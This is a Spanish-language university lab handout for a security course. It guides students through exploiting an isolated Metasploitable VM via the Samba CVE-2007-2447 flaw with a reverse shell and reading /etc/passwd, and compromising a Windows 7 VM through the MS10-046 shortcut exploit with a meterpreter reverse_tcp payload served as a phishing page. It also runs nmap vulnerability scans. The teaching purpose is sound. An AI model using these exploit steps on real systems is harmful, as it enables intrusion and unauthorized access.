0% encontró este documento útil (0 votos)
188 vistas24 páginas

Explotación de Vulnerabilidades en Sistemas

Este documento describe una actividad de aprendizaje sobre la explotación de vulnerabilidades en sistemas informáticos. Los estudiantes utilizarán máquinas virtuales como Metasploitable, Windows 7 y Kali Linux para escanear vulnerabilidades y realizar hacking de aplicaciones. La actividad busca que los estudiantes adquieran competencias en seguridad informática como el uso de herramientas de análisis de vulnerabilidades y el reconocimiento de estándares y buenas prácticas de seguridad.

Cargado por

pa.fernandezr
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
188 vistas24 páginas

Explotación de Vulnerabilidades en Sistemas

Este documento describe una actividad de aprendizaje sobre la explotación de vulnerabilidades en sistemas informáticos. Los estudiantes utilizarán máquinas virtuales como Metasploitable, Windows 7 y Kali Linux para escanear vulnerabilidades y realizar hacking de aplicaciones. La actividad busca que los estudiantes adquieran competencias en seguridad informática como el uso de herramientas de análisis de vulnerabilidades y el reconocimiento de estándares y buenas prácticas de seguridad.

Cargado por

pa.fernandezr
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Implementación EPA

Subdirección de Diseño instruccional

SEGURIDAD EN
Nombre de
ASY613 SISTEMAS Tiemp
Sigla Asignatura la 2h
1 COMPUTACIONA o
Asignatura
LES
Experiencia de Aprendizaje N° 3 Explorando vulnerabilidades
Explotación de Vulnerabilidades
Actividad N° 3.2

Nombre del Recurso Didáctico 3.2.2 Actividad de Explotación de Vulnerabilidades

1. Aprendizajes e indicadores de logro


Aprendizajes (Procedimentales, Indicadores de logro
Actitudinales y conceptuales)

Utilizar mecanismos y herramientas de ● Aplica técnicas de escaneo de vulnerabilidades para


seguridad informática para cumplir normas garantizar la seguridad de la solución requerida por la
y buenas prácticas de la industria a través organización.
de un plan de mitigación de ● Detecta las potenciales vulnerabilidades del software para
vulnerabilidades. proporcionar una solución en los niveles de seguridad que
requiere la organización.
● Es autocrítico en la revisión del cumplimiento de las normas
Desarrollar el autoaprendizaje y la
y buenas prácticas en el ámbito de ciber seguridad.
rigurosidad en la aplicación y cumplimiento
● Indaga en diversas fuentes información abierta sobre
de las normas y buenas prácticas en el
vulnerabilidades que afectan el desarrollo de software y la
ámbito de ciber seguridad.
infraestructura tecnológica.
Reconocer estándares de seguridad para la ● Reconoce los estándares y buenas prácticas asociadas a
aplicación en el desarrollo de software a fin ciberseguridad, necesarias para el desarrollo de código
de mitigar las vulnerabilidades posibles de seguro.
explotar en su fase de operación. ● Reconoce buenas prácticas relacionadas a ciberseguridad,
para el desarrollo de código seguro.
● Identifica las vulnerabilidades del software para el
desarrollo seguro en el marco de la solución requerida por
la organización.

1. Descripción general actividad

Esta es una actividad de carácter formativo de elaborar una política de desarrollo seguro revisando
metodologías de desarrollo seguro que son relevantes para la asignatura y su carrera.

En esta actividad el estudiante adquiere las competencias para realizar la instalación de herramientas de
análisis de vulnerabilidades y realizar hacking de aplicaciones y Sistemas Operativos

Metasploit es una de las herramientas más utilizadas en el mundo del pentesting. Metasploitable es una
máquina creada para practicar habilidades de penetración de sistemas.

Instrucciones:

1. Este trabajo se ejecutará de forma grupal con los mismos grupos ya establecidos

2. Para desarrollar esta actividad deberás disponer de pc e internet.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

2. Instrucciones

En parejas, deberán utilizar las máquinas virtuales del laboratorio, y posteriormente realizar las actividades
que se proponen.

Máquinas Necesarias:
• Máquina Virtual Windows 7
• Máquina Virtual Metasploitable
• Máquina Virtual Kali Linux

3. Actividad

FUENTES:

Disco Metasploitable 2:

https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Página de Metasploit:

https://www.metasploit.com/

Manual de uso y referencias de Metasploit:

https://docs.metasploit.com/

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

PREPARACIÓN:
METASPLOITED

1.1 Construcción máquina:

Importante: Si la máquina METASPLOITED está ya construida en virtualbox, puede saltarse este paso y aplicar
directamente la configuración de red en el paso1.2

En virtual box seleccione crear nueva máquina virtual:

Asigne nombre, sistema tipo linux y versión ubuntu 64 bits a la máquina.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Siga los pasos del proceso hasta el final sin modificar nada y seleccione “Terminar”

Cargue el disco duro de metasploitable a la máquina, si lo descargó desde internet lo encontrará en la carpeta
de descargas (El link se encuentra en la sección superior de FUENTES)

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Utilice la opción seleccionar/crear un disco duro virtual.

Aquí utilice la opción “AÑADIR”, busque el disco duro, agréguelo y luego confirme con CHOOSE:

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

1.2 Configuración de red:

Asegúrese de que la máquina METASPLOITED tiene solo una (1) tarjeta de red y que esta se encuentra en
modo red interna:

Inicie la máquina:

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Metasploit le indicará cuales son las credenciales, es normal que al ingresar la contraseña el sistema no muestra
ningún registro al teclear en el teclado.

Ingrese en orden los siguientes comandos:

1. sudo su (confirme utilizando la misma clave que usó para iniciar sesión en el sistema)

2. ifconfig eth0 192.168.100.50 netmask 255.255.255.0

3. route add default gw 192.168.100.1 eth0

Importante: si bien puede utilizar otra configuración de red, se recomienda que utilice la sugerida por la guía
para evitar posibles problemas de enrutamiento.

Puede verificar la configuración que acaba de realizar utilizando los comandos netstat e ifconfig:

ifconfig eth0

netstat -nr

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

WINDOWS 7

Configure al máquina Windows 7 de virtual box con una interfaz de red en modo red interna:

Inicie la máquina de Windows 7.

En la máquina virtual de Windows 7, abra la ventana de ejecución utilizando las teclas WIN+R e ingrese la
orden:

ncpa.cpl

Si no puede abrir la ventana de ejecución, ábrala desde la barra de Windows:

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Haga click derecho sobre la conexión de red local y seleccione propiedades:

Configure la conexión de red utilizando los parámetros mostrados en la imagen.

IMPORTANTE: Se recomienda utilizar el direccionamiento IP del ejemplo. Si quiere utilizar otros parámetros de
red, asegúrese de que está utilizando el mismo segmento de red que utiliza para metasploitable y Kali.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

KALI LINUX:

Configure KALI LINUX con SOLO UN (desactive los demás) adaptador de red en modo red interna y luego inicie
la máquina virtual.

Desactive la red de Kali. Para ello, haga click derecho sobre la configuración de red y desactive el networking:

Luego, ingrese a la edición de conexiones haciendo click derecho sobre las redes:

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Ingrese al adaptador de red haciendo click sobre él:

En la ventana ethernet seleccione en DEVICE el adaptador de red eth0:

En IPV4 Settings, seleccione el modo manual y configure los parámetros de red según la imagen, luego presione
GUARDAR:

Importante:

IMPORTANTE: Se recomienda utilizar el direccionamiento IP del ejemplo. Si quiere utilizar otros parámetros de
red, asegúrese de que está utilizando el mismo segmento de red que utiliza para metasploitable y Windows7.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

COMPROBACIÓN DE CONECTIVIDAD:
Active nuevamente el direccionamiento de red y realice pings desde Kali hacia Windows 7 y hacia
metasploitable y asegúrese de que tiene conectividad:

SI NO TIENE CONECTIVIDAD; REVISE LOS PASOS DE CONFIGURACIÓN DE LAS MAQUINAS


VIRTUALES.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

METASPLOIT:
Metasploit funciona a través de una base de datos publicada en postgre.
Puede verificar el estado del servicio postgre utilizando los siguientes comandos:
systemctl status postgresql

El servicio puede ser manipulado con los siguientes comandos:


systemctl start postgresql = Inicia el servicio
systemctl stop postgresql = detiene el servicio
systemctl restart postgresql = reinicia el servicio
Inicie el servicio.
La base de datos de metasploit puede ser manipulada a través del comando msfdb y las siguientes opciones:

Verifique el estado de la base de datos de metasploit. Si está detenida, iníciela.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Los exploits y los payloads de metasploit se encuentran cargados usualmente en la ruta por defecto.
Puede acceder a ellos usando el Shell:

O utilizando el navegador de archivos de Linux.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Los EXPLOITS y los PAYLOADS se encuentran clasificados por SO y protocolo. Están escritos la
mayoría de las veces en RUBY. Si usted dispone de conocimiento suficiente, podría editar estos
archivos o utilizarlos como base para crear sus propios exploits.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Actividades:
Explotación de vulnerabilidades con Metasploit hacia Metasploitable – ACCESO NO AUTORIZADO:

1.- Inicie la aplicación Msfconsole utilizando el comando msfconsole: (la aplicación cargará un banner y pasará
a trabajar con la ejecución msfX, donde x es la versión activa de metasploit)

2.- Metasploit permite buscar vulnerabilidades y exploits a través de línea de comando. Pruebe buscar todo lo
relacionado a samba usando el comando :

search samba

Esta búsqueda puede afinarse aún más.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Busque la vulnerabilidad 2007-2447 con el comando search

Ahora que hemos encontrado el exploit, podemos ver su nombre (ruta), la fecha de publicación, un ranking de
clasificación y una breve descripción.

4.- Para poder usar el exploit, se debe cargar utilizando el comando USE junto con el nombre (ruta) del exploit:

use “ingresar-ruta”

Una carga exitosa nos mostrará ahora en rojo el nombre del exploit que estamos usando. Una carga fallida
deberá ser revisada y reintentada.

5.- Utilice los parámetros:

Todo exploit tiene una serie de parámetros que deben ser cargados. En este caso debemos cargar:

1. RHOST : dirección ip de la víctima

2. LHOST: dirección ip del atacante

3. RPORT: puerto a través del cual se realizará el ataque

4. PAYLOAD: código malicioso que se inyectará.

Puede ver los payloads a través del comando:

show payloads

Estos se cargan igual que el exploit, escribiendo la ruta.

Para este ataque utilizaremos el payload: cmd/unix/reverse, nuestro objetivo será la máquina metasploitable y
el puerto usado será el puerto 445. La máquina local es KALI LINUX

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Cuando haya terminado de establecer los parámetros, escriba “exploit” para iniciar el ataque.

El resultado muestra que se abrió una sesión Shell.

Digite los siguientes comandos y reflexione:

Ifconfig eth0 (cual es la dirección ip que se muestra? A qué máquina corresponde?)

cat /etc/fstab (Qué es lo que estamos viendo? Qué se podría hacer con esta información?)

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

cat /etc/passwd (Qué es lo que estamos viendo? Qué se podría hacer con esta información?)

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Actividades:
Explotación de vulnerabilidades con Metasploit y MALWARE hacia Windows 7 - PHISHING:

Importante: Dependiendo de la versión de Windows 7 cargada en la imagen de la que usted dispone en


virtual box, este ataque podría no funcionar.

Cargue en metasploit el exlpoit exploit/Windows/browser/ms10_046_shortcut_icon_dllloader

Cargue el payload windows/meterpreter/reverse_tcp

Configure las opciones SRVHOST y LHOST con la ip atacante (de Kali):

Verifique la configuración con show options, si todo está correcto arranque el exploit con EXPLOIT:

Si todo está configurado correctamente, debería recibir una configuración vía consola:

Ahora Kali ha iniciado un servidor web y está preparado para atacar a quien ingrese a ese servidor.

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Desde la máquina Windows 7 acceda al servidor web utilizando la dirección de Kali para visitarla en una página
web a través del puerto 80 usando el formato:

192.168.100.100:80

En cuanto haya ingresado desde el equipo Windows 7. Kali le notificará que la víctima ha sido infectada:

Verifique las sesiones abiertas utilizando el comando:

Sesión -l

Explote la inyección de malware utilizando el comando sessions -i x, donde x es el número de sesión a explotar.
En este caso, es la sesión 1

Arroje un “?” a la consola para ver los comandos disponibles en el sistema de la víctima:

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Ahora hay una conexión establecida con la víctima.

Pruebe ingresar los comandos:

sysinfo
getuid
whoami

¿Qué información devuelven los comandos?

(Si tras el acceso de la máquina Windows 7 al portal web no hay sesiones abiertas, el SO está parchado contra
la vulnerabilidad.)

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Actividades:
Escaneos de vulnerabilidad con NMAP – ANALISIS DE VULNERABILIDADES

Utilice la máquina metasploitable como victima y desde Kali lance los siguientes comandos:

nmap -f -sS -sV -Pn --script auth 192.168.100.50

Investigue sobre las vulnerabilidades presentes en el sistema:

A qué servicios corresponden?

Cómo pueden ser explotadas?

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano


Implementación EPA
Subdirección de Diseño instruccional

Lance el siguiente análisis de vulnerabilidades

nmap -f --script vuln 192.168.100.50

Investigue sobre las vulnerabilidades presentes en el sistema:

*esto es solo parte de los resultados

A qué servicios corresponden?

Cómo pueden ser explotadas?

Docente Diseñador Daniel Sepúlveda Revisor metodológico Alicia Zambrano

También podría gustarte